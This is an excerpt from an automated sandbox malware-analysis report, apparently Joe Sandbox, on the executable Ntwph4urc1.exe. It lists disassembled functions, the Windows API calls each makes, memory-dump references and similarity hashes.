                                              • Opcode ID: af319a29290b029ce5fddf05959ec8084cbb0a0163aa5ce5a800cf6ae1bf2954
                                              • Instruction ID: a0686faca365a727748c0602422b19a99e1e577425e3ae8133f46283b43b75e6
                                              • Opcode Fuzzy Hash: af319a29290b029ce5fddf05959ec8084cbb0a0163aa5ce5a800cf6ae1bf2954
                                              • Instruction Fuzzy Hash: 63219671600104EBCF10AFA5CE49A9E7A71AF55358F70413BF515B91E0CBBD8E829A2E
                                              Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Global$AllocFree
                                              • String ID: Call
                                              • API String ID: 3394109436-1824292864
                                              • Opcode ID: c08fe461fcbc7eb508863a6e274c322000732a28328c89134215c3cfb5836e23
                                              • Instruction ID: 2334a48e4172ebb904b3f5af91f3a45bddc9a396230004d4704967bba2e99f69
                                              • Opcode Fuzzy Hash: c08fe461fcbc7eb508863a6e274c322000732a28328c89134215c3cfb5836e23
                                              • Instruction Fuzzy Hash: 822162736001109BDB20AF64DDC495A73B4AB18328725453BF952F72D0C6B8A8508BAD
                                              Function 00402522 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 00402553
                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID:
                                              • API String ID: 3356406503-0
                                              • Opcode ID: 8d3d9d412d4888d3c3e3282b3648761cf87a4cea446e4038cc6d0bf9c2fd6c8d
                                              • Instruction ID: ca3dd7d1b7a13d3c8a9a28b827632004175b2a1fd75c59dcebef83c1aa991e75
                                              • Opcode Fuzzy Hash: 8d3d9d412d4888d3c3e3282b3648761cf87a4cea446e4038cc6d0bf9c2fd6c8d
                                              • Instruction Fuzzy Hash: 00113AB1911219EBDF14DFA4DE589AEB774FF04354B20843BE402B62D0D7B88A44DB6E
                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                              • Instruction ID: 3e9f44f44444eb33be3e1f1d809517d1ef13f380758e007b8d3e22890c14ce30
                                              • Opcode Fuzzy Hash: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                              • Instruction Fuzzy Hash: 0301F432624220ABE7195B389D05B2A3698E751318F10C13FF855F6AF1EA78CC02DB4D
                                              Function 0040242C Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 0040244E
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402457
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CloseDeleteValue
                                              • String ID:
                                              • API String ID: 2831762973-0
                                              • Opcode ID: 3b2b3679bd27be8986a20790fb1aa9d433e7eb96043e8b231018ce36cdcb7856
                                              • Instruction ID: b1f28ea4fe1f397702134e154a5d50ad3aafc71d487b2ad51b946e19fd30fa70
                                              • Opcode Fuzzy Hash: 3b2b3679bd27be8986a20790fb1aa9d433e7eb96043e8b231018ce36cdcb7856
                                              • Instruction Fuzzy Hash: 3CF09672A00120ABDB10AFA89B4DAAE73B5AF45314F12443FF651B71C1DAFC5D01963E
                                              Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                              • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Window$EnableShow
                                              • String ID:
                                              • API String ID: 1136574915-0
                                              • Opcode ID: a206bc09d31208a55ef0f8a5c470fd50e96019e1354e9f0dd429e4c405301b30
                                              • Instruction ID: a2c3742fa11dc5cf357e4fc2c1b39d3237f925362780464401897514ce5169fc
                                              • Opcode Fuzzy Hash: a206bc09d31208a55ef0f8a5c470fd50e96019e1354e9f0dd429e4c405301b30
                                              • Instruction Fuzzy Hash: 64E09A72A042009FD704EFA4AE488AEB3B4EB90325B20497FE401F20C1CBB85D00862E
                                              Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              • Opcode ID: ed0fba548ae3e193f0e5ef583f5be9fd2d24872a13bb97bcc89e0a3ab6842b84
                                              • Instruction ID: b2fefa23d47a0510f6e3c17d58d1e446f1e854612225740054352d4863a47d08
                                              • Opcode Fuzzy Hash: ed0fba548ae3e193f0e5ef583f5be9fd2d24872a13bb97bcc89e0a3ab6842b84
                                              • Instruction Fuzzy Hash: 5CE0BF76B24114ABCB18DFA8ED90C6E77B6EB95310720847AE512B3690C679AD10CB68
                                              Function 004067E3 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                                • Part of subcall function 00406773: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                                • Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
                                                • Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                              • String ID:
                                              • API String ID: 2547128583-0
                                              • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                              • Instruction ID: 99a4bc67a8c43757839ce5658996565e88f4cb2ecc15aeea03f34014f97f3c52
                                              • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                              • Instruction Fuzzy Hash: F2E0863350521056E611AA719D44C7773AC9F89650307843EF946F2080D738DC31ABBD
                                              Function 00405EE4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: File$AttributesCreate
                                              • String ID:
                                              • API String ID: 415043291-0
                                              • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                              • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                              • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                              • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                              Function 00405EBF Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,?,00405AC4,?,?,00000000,00405C9A,?,?,?,?), ref: 00405EC4
                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405ED8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                              • Instruction ID: 9f802252afbb128bb6d2778500f244350c46036787b5d1505cff2c7139ff2394
                                              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                              • Instruction Fuzzy Hash: 3CD0C9725055306BC2102728EE0C89BBB55EB64271B114A35F9A5A62B0CB304C528A98
                                              Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403495,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 004059A8
                                              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059B6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryErrorLast
                                              • String ID:
                                              • API String ID: 1375471231-0
                                              • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                              • Instruction ID: 379133542b1e1e7011c0d69b4b2ae41cc98c6aec5a22f3063a42931ced3e53c7
                                              • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                              • Instruction Fuzzy Hash: 1EC04C71205502EEF6115B20DF48B1B7A909B50751F16843DA146E01E4DE389455D92D
